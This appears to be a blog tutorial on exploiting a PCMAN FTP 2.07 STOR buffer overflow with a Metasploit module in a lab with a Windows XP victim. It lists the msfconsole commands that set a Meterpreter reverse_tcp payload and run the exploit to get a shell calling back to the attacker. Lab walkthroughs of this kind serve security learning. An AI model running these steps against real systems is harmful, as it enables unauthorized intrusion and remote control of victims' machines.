Exploit Windows PC Using PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow

This Metasploit module exploits a buffer overflow vulnerability found in the STOR command of the PCMAN FTP version 2.07 server when the “/../” parameters are also sent to the server. Please note authentication is required in order to trigger the vulnerability. The overflowing string will also be seen on the FTP server log console.

Exploit Targets

PCMAN FTP version 2.07

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/ftp/pcman_stor

msf exploit (pcman_stor)>set payload windows/meterpreter/reverse_tcp

msf exploit (pcman_stor)>set lhost 192.168.1.4 (IP of Local Host)

msf exploit (pcman_stor)>set rhost 192.168.1.5 (IP of victim PC)

msf exploit (pcman_stor)>exploit 

 

1 Comment Exploit Windows PC Using PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow

Leave a Reply

Your email address will not be published. Required fields are marked *